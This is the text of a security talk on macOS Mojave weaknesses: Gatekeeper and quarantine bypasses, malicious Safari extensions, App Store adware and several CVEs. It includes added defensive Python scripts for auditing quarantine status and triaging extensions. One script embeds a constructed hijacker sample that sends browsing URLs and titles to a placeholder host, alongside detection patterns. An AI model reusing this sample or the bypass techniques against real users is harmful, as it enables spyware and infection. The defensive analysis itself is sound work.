Mojave Security Flaws
Or their issues
>Whoami
Vitaliy Mechytashvili.
Malware Analyst with Under Defense LLC
vim@underdefense.com
https://twitter.com/myautd
https://t.me/myautd
2
Agenda
macOS 10.14 has made a lot of security improvements, but there are a few things you
have to know about, like Gatekeeper bypass, installation-source bypass and many other
tricks used to infect your macOS.
3
Security Features
● Mojave security updates.
● Gatekeeper
● App Store
● Safari Extensions
● Trusted installation source
● CVEs
4
MacOS Mojave Security Updates
Release Date: 24 September 2018.
● Control of Your privacy:
○ Requires approval before an application can access your camera or microphone
○ Also requires approval before an application can access personal data, like Mail,
Contacts, etc.
● Safari improvements:
○ Enhanced Tracking Prevention
○ Built-in password manager
○ Extensions can be installed only from the trusted store
5
Control of privacy
This update really protects users from potential privacy disclosure.
For real, this is the only security feature in macOS that is working properly.
What is your privacy really worth to Apple?
6
Authorization bypass
See the comment in Authorization.h and the code in trampolineClient.cpp; both sources are available on
opensource.apple.com
7
● Apps are “quarantined” when downloaded
● Gatekeeper checks the signature only for quarantined apps
● After the app is opened, the quarantine flag is removed
● The code signature is never checked again
8
Code signing flow
9
Gatekeeper bypass
● Applications downloaded with curl are never quarantined
● Even when the application’s checksum changes, it still isn’t quarantined
● Malware can remove the quarantine flag using the “xattr” command (Xcode command-line tools)
● A dropper can sign any application with its own certificate
Gatekeeper signatures database
● Anyone can get a valid developer signature
● Signatures are revoked after users report abuse to Apple
● Signature updates reach users’ endpoints two times per year
10
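The quarantine and signature checks described on the two slides above, as an added example (this script is not from the talk or from UnderDefense): it reads the com.apple.quarantine attribute through the xattr command, asks codesign and spctl to verify the item, and turns the results into the verdict a defender wants, namely that an item without the attribute is never assessed by Gatekeeper at all. It assumes the four-field attribute layout (flags; hex Unix timestamp; downloading agent; UUID) that macOS writes; the meaning of individual flag bits is Apple-internal and is reported raw. The sample attribute value in the comments is constructed.

```python
"""Audit a downloaded item's quarantine attribute and Gatekeeper status (macOS).

Added example, not code from the slides. On a non-macOS host the xattr,
codesign and spctl tools are absent, so only the parser runs there.
"""
import datetime
import shutil
import subprocess

QUARANTINE_ATTR = "com.apple.quarantine"


def parse_quarantine(value: str) -> dict:
    """Decode a quarantine attribute string such as (constructed sample)
    '0081;5bd1a2c3;Safari;3B7D1A6B-1E2F-4C5D-8A9B-0C1D2E3F4A5B'.

    Assumed layout: flags (hex); download time (hex seconds since the Unix
    epoch); the agent that downloaded the file; a UUID that links the item
    to the LaunchServices quarantine database.
    """
    parts = value.strip().split(";")
    if len(parts) < 4:
        raise ValueError(f"unexpected quarantine attribute: {value!r}")
    flags_hex, ts_hex, agent, uuid = parts[0], parts[1], parts[2], parts[3]
    downloaded = datetime.datetime.fromtimestamp(int(ts_hex, 16), tz=datetime.timezone.utc)
    return {
        "flags": int(flags_hex, 16),          # raw bit field, not decoded
        "downloaded_at": downloaded.isoformat(),
        "agent": agent,
        "uuid": uuid,
    }


def _run(cmd):
    """Run a tool and return (exit_code, combined_output); None if the tool is missing."""
    if shutil.which(cmd[0]) is None:
        return None
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return proc.returncode, (proc.stdout + proc.stderr).strip()


def read_quarantine(path: str):
    """Return the raw quarantine attribute for path, or None if absent or not on macOS."""
    result = _run(["xattr", "-p", QUARANTINE_ATTR, path])
    if result is None or result[0] != 0:
        return None
    return result[1]


def assess(path: str) -> dict:
    """Collect quarantine, codesign and spctl results for one bundle or binary."""
    report = {"path": path, "quarantine": None, "codesign_ok": None, "spctl_ok": None}
    raw = read_quarantine(path)
    if raw:
        report["quarantine"] = parse_quarantine(raw)
    # Strict, deep signature verification of the bundle and everything nested in it.
    cs = _run(["codesign", "--verify", "--deep", "--strict", path])
    if cs is not None:
        report["codesign_ok"] = cs[0] == 0
    # Gatekeeper policy assessment, as if the user had double-clicked the item.
    sp = _run(["spctl", "--assess", "--type", "execute", path])
    if sp is not None:
        report["spctl_ok"] = sp[0] == 0
    return report


def verdict(report: dict) -> str:
    """Summarise what the report means for a defender."""
    if report["quarantine"] is None:
        return "NOT QUARANTINED: Gatekeeper will not assess this item; verify it manually"
    if report["codesign_ok"] is False or report["spctl_ok"] is False:
        return "BLOCKED: signature or Gatekeeper policy check failed"
    if report["codesign_ok"] is None and report["spctl_ok"] is None:
        return "UNKNOWN: macOS verification tools not available on this host"
    return "ACCEPTED: quarantined item with a valid signature"


if __name__ == "__main__":
    import sys
    for item in sys.argv[1:]:
        rep = assess(item)
        print(item, "->", verdict(rep), rep)
```

Run it as `python3 audit.py /Applications/Some.app` on the Mac being checked; anything reported as NOT QUARANTINED is exactly the curl-downloaded or xattr-stripped case the slides describe and deserves a manual codesign review.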
App Store
Trusted Mac application store. Or not?
“The App Store contains a sandbox which validates applications before they become available to users.”
How does sandboxing work for real?
This is an example of a search hijacker, which first appeared in the
Extensions Store more than half a year ago.
11
Adware Doctor
This is the fake “Adware Doctor”, which collects users’ personal data.
Top 4 in Canada, Top 1 in the US App Store among paid applications.
A manual dynamic analysis workshop from the @DC38032 community is available on YouTube:
https://www.youtube.com/watch?v=B-XELDUtaa8
12
Safari Extensions Store
How to contribute to the app store:
● You should clearly and accurately disclose what extensions are made available in the app’s
marketing text and the extensions may not include marketing, advertising or in-app purchases.
● They may not interfere with System or Safari UI elements and must never include malicious or
misleading content or code.
● Apple reviews all extensions and updates to ensure they work reliably.
13
How does the Extensions Store work
Search Manager.
It changes your homepage, new tab page and default search provider to Yahoo.
Works only in targeted countries.
Indicators of compromise:
● Does not allow changing the search service and homepage manually through preferences.
● Collects search terms for advertisement suggestions.
● Doesn’t show any search results, only advertisements and promotions.
14
Search Manager
15
Search redirecting
Uses the built-in browser extension events “beforeSearch” and “beforeNavigate”.
Hijacks the user’s search term and replaces the search service URL with its own.
16
Browsing History
Each time the user opens any URL, this extension captures information like the web page title and
URL, then sends it to its own server.
17
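A defender-side check for the behaviour described on the Search Manager, Search redirecting and Browsing History slides, as an added example (not code from the talk, from UnderDefense or from the extension itself): a static triage pass over an unpacked Safari extension’s JavaScript that flags the traits the slides list, namely hooking “beforeSearch” and “beforeNavigate”, rewriting the search URL, and shipping page title and URL to a remote host. The sample extension source, its hostnames (.test placeholders) and the allow-list of expected search hosts are all constructed for this example; the same function can be pointed at extension files found outside the default extensions folder.

```python
"""Static triage of Safari extension JavaScript for search-hijacker traits.

Added example, not part of the slides. Heuristics only: a hit means
"look closer", not a verdict.
"""
import re
from typing import Dict, List

# Indicator name -> regex over the extension source (legacy Safari extension API names).
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "hooks_beforeSearch": re.compile(r'addEventListener\(\s*["\']beforeSearch["\']'),
    "hooks_beforeNavigate": re.compile(r'addEventListener\(\s*["\']beforeNavigate["\']'),
    "cancels_event": re.compile(r'\.preventDefault\(\)'),
    # assigning a search-style URL (…?q= / …&q=) to a tab's url property
    "rewrites_search_url": re.compile(r'\.url\s*=\s*["\']https?://[^"\']+[?&]q=', re.I),
    "reads_page_title": re.compile(r'\.title\b'),
    "posts_to_remote": re.compile(r'(XMLHttpRequest|\bfetch\()'),
}

URL_RE = re.compile(r'https?://([a-z0-9.-]+)', re.I)

# Constructed allow-list: hosts a legitimate search-provider extension would talk to.
ALLOWED_HOSTS = {"www.apple.com", "www.google.com", "search.yahoo.com"}

# Constructed sample resembling the hijacker described in the talk; hostnames are placeholders.
SAMPLE_JS = r"""
safari.application.addEventListener("beforeSearch", function (e) {
  e.preventDefault();
  e.target.url = "https://search.example-placeholder.test/?q=" + encodeURIComponent(e.query);
}, true);
safari.application.addEventListener("beforeNavigate", function (e) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https://c2.example-placeholder.test/collect");
  xhr.send(JSON.stringify({ url: e.url, title: e.target.title }));
}, true);
"""


def triage(source: str) -> List[str]:
    """Return the names of all indicators present in the source."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def remote_hosts(source: str) -> List[str]:
    """All hostnames referenced by absolute URLs in the source, lower-cased and sorted."""
    return sorted({m.group(1).lower() for m in URL_RE.finditer(source)})


def score(source: str) -> Dict:
    """Combine indicators into the two behaviours the slides describe."""
    hits = triage(source)
    unknown = [h for h in remote_hosts(source) if h not in ALLOWED_HOSTS]
    search_hijack = "hooks_beforeSearch" in hits and "rewrites_search_url" in hits
    history_exfil = ("hooks_beforeNavigate" in hits and "posts_to_remote" in hits
                     and bool(unknown))
    return {
        "indicators": hits,
        "unknown_hosts": unknown,
        "search_hijack": search_hijack,
        "history_exfil": history_exfil,
    }


if __name__ == "__main__":
    import sys
    # Usage: python3 triage.py path/to/global.js [more files...]; no args scans the sample.
    sources = [open(p, encoding="utf-8", errors="replace").read() for p in sys.argv[1:]] or [SAMPLE_JS]
    for src in sources:
        print(score(src))
```

Legacy Safari extensions are zip-style archives; unpack them and point the script at the global page and injected scripts. An extension that hooks both events, rewrites search URLs and talks to hosts outside the allow-list matches every indicator of compromise on the Search Manager slide.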
Trusted installation source
From macOS Mojave (10.14), by default users can install applications and extensions
only from the App Store and the Extensions Store.
● An extension installed on a user’s system must be code-signed.
● An extension can only be installed from the Safari Extensions Store.
● An extension must not violate the App Store criteria.
18
Easy to bypass
26 lines of AppleScript are enough to install a malicious extension on your system.
Easy to implement and quite difficult to detect.
● Developer features can be turned off
● The extension can be placed outside the default path
19
Malware Carriers/Droppers
Adobe_Flash_Player_Installer_1337.dmg. Go ahead and install everything you download.
20
CVE List
According to all-time CVE stats,
Mac OS is the TOP-4 vulnerable OS.
Link: https://www.cvedetails.com/top-50-products.php?year=0
22
0-day exploit prices
23
CVE-2017-7149: Password Exposure
The password hint of an Apple encrypted volume contains the encryption password.
24
CVE-2017-7170: Privilege Escalation
0-day discovered by Patrick Wardle (Objective-See):
secure authentication dialogs store the password via tmpfile(), and
tmpfile() creates a randomly named file in /tmp/.
25
CVE-2017-13872: #iamroot
Press “Enter” two times to get root.
In macOS Sierra, you can bypass authentication by changing the username to “root”
and pressing “Enter” two times.
26
How to protect yourself
● Objective-See (https://objective-see.com)
○ Knock-Knock
○ Block-Block
● Google Santa
● Any antivirus that is not busy doing ML while your disk gets fully encrypted
○ BitDefender
○ MacKeeper
○ Malwarebytes
○ Norton
27
How to protect yourself
● Objective-See (https://objective-see.com)
○ Knock-Knock
○ Block-Block
● Google Santa
● Any antivirus is better than nothing
○ BitDefender
○ MacKeeper
○ Malwarebytes
○ Norton
28
Thank you!
Ukraine
Lviv Heroiv UPA 73 k.38, Lviv, 79014
Tel: +38 063 11 357 66
email: help@underdefense.com
Poland
Wrocław Rzeźnicza str. 28-31, 50-130
Tel: +48 881 300 889
email: help@underdefense.com
Malta
Birkirkara 170, Pater House, Psaila St,
BKR 9077, Tel: +356 2759 5000
email: help@underdefense.com
USA
New York 375 Park Avenue, Suite 2800, NY
Tel: +1 929 999 5101
email: help@underdefense.com
29

Editor's Notes

  1. https://www.youtube.com/watch?v=B-XELDUtaa8